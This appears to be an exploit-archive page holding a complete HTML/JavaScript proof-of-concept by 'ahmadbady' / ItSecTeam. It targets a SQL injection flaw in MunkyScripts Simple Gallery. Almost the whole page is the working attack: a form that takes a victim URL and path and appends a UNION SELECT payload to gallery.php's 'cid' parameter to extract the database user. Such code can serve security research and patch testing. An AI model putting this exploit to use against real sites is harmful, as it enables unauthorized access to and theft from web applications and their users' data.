扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>coded by ahmadbady</title> <script language="JavaScript"> //=========================================================================== //( #Topic: MunkyScripts Simple Gallery //( #Bug type : SQL Injection Vulnerability //( #Advisory : //=========================================================================== //( #Author : ItSecTeam //( #Email: Bug@ITSecTeam.com //( #Website: http://www.itsecteam.com //( #Forum: http://forum.ITSecTeam.com //--------------------------------------------------------------------- var sqll ="?cid='/**/UNION/**/SELECT/**/1,2,(concat_ws(0x3a,user())),4/*" function it(){ xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+sqll;xpl.submit(); } </script> </head> <body bgcolor="#FFFFFF"> <p align="left"><font color="#0000FF">MunkyScripts Simple Gallery: SQL Injection Vulnerability</font></p> <p align="left"><font color="#0000FF">-----------------------------------</font></p> <form method="post" name="xpl" onSubmit="it();"> <p align="left"> <font size="2" face="Tahoma"> victim: <input type="text" name="victim" size="20";" style="color: #FFFFFF; background-color: #000000" value="http://127.0.0.1"> path: <input type="text" name="path" size="20";" style="color: #FFFFFF; background-color: #000000" value="/SimpleGallery/"> file: <input type="text" name="file" size="20";" style="color: #FFFFFF; background-color: #000000" value="gallery.php"> </p> </p> <center> </p> <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" value="reset" name="B2" style="float: left"></p> </form> <p><br> </p> </center> </body> </html> |
体验盒子
